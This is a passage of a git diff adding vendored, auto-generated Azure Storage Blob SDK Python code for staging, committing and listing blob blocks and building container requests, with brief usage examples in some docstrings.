map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', 
response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + put_blob_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def stage_block( # pylint: disable=inconsistent-return-statements + self, + block_id, # type: str + content_length, # type: int + body, # type: IO + transactional_content_md5=None, # type: Optional[bytearray] + transactional_content_crc64=None, # type: Optional[bytearray] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Stage Block operation creates a new block to be committed as part of a blob. + + :param block_id: A valid Base64 string value that identifies the block. Prior to encoding, the + string must be less than or equal to 64 bytes in size. For a given blob, the length of the + value specified for the blockid parameter must be the same size for each block. + :type block_id: str + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :keyword comp: comp. Default value is "block". Note that overriding this default value may + result in unsupported behavior. 
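A minimal sketch of the stage-then-commit flow through the public
``BlobClient`` wrapper (the SAS URL is a placeholder; pre-encoding block IDs
must have a uniform length per blob, which ``uuid4().hex`` satisfies)::

    import uuid

    from azure.storage.blob import BlobBlock, BlobClient

    blob = BlobClient.from_blob_url(
        "https://<account>.blob.core.windows.net/<container>/<blob>?<sas>"
    )
    block_ids = []
    for chunk in (b"part-1", b"part-2"):
        block_id = uuid.uuid4().hex  # 32 characters, uniform length
        blob.stage_block(block_id=block_id, data=chunk)  # Put Block
        block_ids.append(block_id)
    # Staged blocks are invisible to readers until the list is committed.
    blob.commit_block_list([BlobBlock(block_id=i) for i in block_ids])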
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "block") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + _content = body + + request = build_stage_block_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + block_id=block_id, + content_length=content_length, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + request_id_parameter=request_id_parameter, + template_url=self.stage_block.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + stage_block.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def stage_block_from_url( # pylint: 
disable=inconsistent-return-statements + self, + block_id, # type: str + content_length, # type: int + source_url, # type: str + source_range=None, # type: Optional[str] + source_content_md5=None, # type: Optional[bytearray] + source_contentcrc64=None, # type: Optional[bytearray] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + copy_source_authorization=None, # type: Optional[str] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + source_modified_access_conditions=None, # type: Optional["_models.SourceModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Stage Block operation creates a new block to be committed as part of a blob where the + contents are read from a URL. + + :param block_id: A valid Base64 string value that identifies the block. Prior to encoding, the + string must be less than or equal to 64 bytes in size. For a given blob, the length of the + value specified for the blockid parameter must be the same size for each block. + :type block_id: str + :param content_length: The length of the request. + :type content_length: long + :param source_url: Specify a URL to the copy source. + :type source_url: str + :param source_range: Bytes of source data in the specified range. Default value is None. + :type source_range: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param source_contentcrc64: Specify the crc64 calculated for the range of bytes that must be + read from the copy source. Default value is None. + :type source_contentcrc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword comp: comp. Default value is "block". Note that overriding this default value may + result in unsupported behavior. 
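The URL variant assembles a blob from byte ranges of another readable object
without routing the data through the client. A sketch under the same
placeholder-URL assumptions as above::

    from azure.storage.blob import BlobBlock, BlobClient

    blob = BlobClient.from_blob_url(
        "https://<account>.blob.core.windows.net/<container>/<dest>?<sas>"
    )
    src = "https://<account>.blob.core.windows.net/<container>/<source>?<sas>"
    # Stage the first 4 MiB of the source as a single block (Put Block From URL).
    blob.stage_block_from_url(
        block_id="0" * 32,
        source_url=src,
        source_offset=0,
        source_length=4 * 1024 * 1024,
    )
    blob.commit_block_list([BlobBlock(block_id="0" * 32)])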
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "block") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _lease_id = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + + request = build_stage_block_from_url_request( + url=self._config.url, + comp=comp, + version=self._config.version, + block_id=block_id, + content_length=content_length, + source_url=source_url, + source_range=source_range, + source_content_md5=source_content_md5, + source_contentcrc64=source_contentcrc64, + timeout=timeout, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + lease_id=_lease_id, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + request_id_parameter=request_id_parameter, + copy_source_authorization=copy_source_authorization, + template_url=self.stage_block_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', 
response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + stage_block_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def commit_block_list( # pylint: disable=inconsistent-return-statements + self, + blocks, # type: "_models.BlockLookupList" + timeout=None, # type: Optional[int] + transactional_content_md5=None, # type: Optional[bytearray] + transactional_content_crc64=None, # type: Optional[bytearray] + metadata=None, # type: Optional[Dict[str, str]] + tier=None, # type: Optional[Union[str, "_models.AccessTierOptional"]] + request_id_parameter=None, # type: Optional[str] + blob_tags_string=None, # type: Optional[str] + immutability_policy_expiry=None, # type: Optional[datetime.datetime] + immutability_policy_mode=None, # type: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] + legal_hold=None, # type: Optional[bool] + blob_http_headers=None, # type: Optional["_models.BlobHTTPHeaders"] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + cpk_info=None, # type: Optional["_models.CpkInfo"] + cpk_scope_info=None, # type: Optional["_models.CpkScopeInfo"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> None + """The Commit Block List operation writes a blob by specifying the list of block IDs that make up + the blob. In order to be written as part of a blob, a block must have been successfully written + to the server in a prior Put Block operation. You can call Put Block List to update a blob by + uploading only those blocks that have changed, then committing the new and existing blocks + together. You can do this by specifying whether to commit a block from the committed block list + or from the uncommitted block list, or to commit the most recently uploaded version of the + block, whichever list it may belong to. + + :param blocks: Blob Blocks. + :type blocks: ~azure.storage.blob.models.BlockLookupList + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. 
See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "blocklist". Note that overriding this default value may + result in unsupported behavior. 
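At this generated layer the committed/uncommitted/latest choice is expressed
through the ``BlockLookupList`` model; a sketch of how the XML body is built
(the ``_generated`` module path is internal and may move between SDK
versions)::

    from azure.storage.blob._generated.models import BlockLookupList

    # "latest" commits the most recently uploaded copy of each block,
    # whichever list (committed or uncommitted) it currently sits in.
    blocks = BlockLookupList(latest=["YmxvY2stMDA=", "YmxvY2stMDE="])
    # Serializes to <BlockList><Latest>YmxvY2stMDA=</Latest>...</BlockList>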
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "blocklist") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _blob_cache_control = None + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_cache_control = blob_http_headers.blob_cache_control + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = self._serialize.body(blocks, 'BlockLookupList', is_xml=True) + + request = build_commit_block_list_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + blob_cache_control=_blob_cache_control, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + tier=tier, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.commit_block_list.metadata['url'], + ) + request = _convert_request(request) + request.url = 
self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + commit_block_list.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace + def get_block_list( + self, + snapshot=None, # type: Optional[str] + list_type="committed", # type: Union[str, "_models.BlockListType"] + timeout=None, # type: Optional[int] + request_id_parameter=None, # type: Optional[str] + lease_access_conditions=None, # type: Optional["_models.LeaseAccessConditions"] + modified_access_conditions=None, # type: Optional["_models.ModifiedAccessConditions"] + **kwargs # type: Any + ): + # type: (...) -> "_models.BlockList" + """The Get Block List operation retrieves the list of blocks that have been uploaded as part of a + block blob. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param list_type: Specifies whether to return the list of committed blocks, the list of + uncommitted blocks, or both lists together. Default value is "committed". + :type list_type: str or ~azure.storage.blob.models.BlockListType + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. 
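Through the public wrapper the same operation surfaces as a pair of block
lists; a sketch, again with a placeholder SAS URL::

    from azure.storage.blob import BlobClient

    blob = BlobClient.from_blob_url(
        "https://<account>.blob.core.windows.net/<container>/<blob>?<sas>"
    )
    committed, uncommitted = blob.get_block_list(block_list_type="all")
    print([b.id for b in committed], [b.id for b in uncommitted])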
+ :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "blocklist". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: BlockList, or the result of cls(response) + :rtype: ~azure.storage.blob.models.BlockList + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.BlockList"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "blocklist") # type: str + + _lease_id = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + + request = build_get_block_list_request( + url=self._config.url, + comp=comp, + version=self._config.version, + snapshot=snapshot, + list_type=list_type, + timeout=timeout, + lease_id=_lease_id, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.get_block_list.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['x-ms-blob-content-length']=self._deserialize('long', response.headers.get('x-ms-blob-content-length')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('BlockList', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_block_list.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_container_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_container_operations.py new file mode 100644 index 
0000000..1031c20 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/operations/_container_operations.py @@ -0,0 +1,2740 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import TYPE_CHECKING + +from msrest import Serializer + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import HttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator import distributed_trace + +from .. import models as _models +from .._vendor import _convert_request, _format_url_section + +if TYPE_CHECKING: + # pylint: disable=unused-import,ungrouped-imports + from typing import Any, Callable, Dict, IO, List, Optional, TypeVar, Union + T = TypeVar('T') + ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]] + +_SERIALIZER = Serializer() +_SERIALIZER.client_side_validation = False +# fmt: off + +def build_create_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + metadata = kwargs.pop('metadata', None) # type: Optional[Dict[str, str]] + access = kwargs.pop('access', None) # type: Optional[Union[str, "_models.PublicAccessType"]] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + default_encryption_scope = kwargs.pop('default_encryption_scope', None) # type: Optional[str] + prevent_encryption_scope_override = kwargs.pop('prevent_encryption_scope_override', None) # type: Optional[bool] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if metadata is not None: + _header_parameters['x-ms-meta'] = _SERIALIZER.header("metadata", metadata, '{str}') + if access is not None: + _header_parameters['x-ms-blob-public-access'] = _SERIALIZER.header("access", access, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + if default_encryption_scope is not None: + 
_header_parameters['x-ms-default-encryption-scope'] = _SERIALIZER.header("default_encryption_scope", default_encryption_scope, 'str') + if prevent_encryption_scope_override is not None: + _header_parameters['x-ms-deny-encryption-scope-override'] = _SERIALIZER.header("prevent_encryption_scope_override", prevent_encryption_scope_override, 'bool') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="PUT", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def build_get_properties_request( + url, # type: str + **kwargs # type: Any +): + # type: (...) -> HttpRequest + restype = kwargs.pop('restype', "container") # type: str + version = kwargs.pop('version', "2021-04-10") # type: str + timeout = kwargs.pop('timeout', None) # type: Optional[int] + lease_id = kwargs.pop('lease_id', None) # type: Optional[str] + request_id_parameter = kwargs.pop('request_id_parameter', None) # type: Optional[str] + + accept = "application/xml" + # Construct URL + _url = kwargs.pop("template_url", "{url}/{containerName}") + path_format_arguments = { + "url": _SERIALIZER.url("url", url, 'str', skip_quote=True), + } + + _url = _format_url_section(_url, **path_format_arguments) + + # Construct parameters + _query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any] + _query_parameters['restype'] = _SERIALIZER.query("restype", restype, 'str') + if timeout is not None: + _query_parameters['timeout'] = _SERIALIZER.query("timeout", timeout, 'int', minimum=0) + + # Construct headers + _header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any] + if lease_id is not None: + _header_parameters['x-ms-lease-id'] = _SERIALIZER.header("lease_id", lease_id, 'str') + _header_parameters['x-ms-version'] = _SERIALIZER.header("version", version, 'str') + if request_id_parameter is not None: + _header_parameters['x-ms-client-request-id'] = _SERIALIZER.header("request_id_parameter", request_id_parameter, 'str') + _header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str') + + return HttpRequest( + method="GET", + url=_url, + params=_query_parameters, + headers=_header_parameters, + **kwargs + ) + + +def 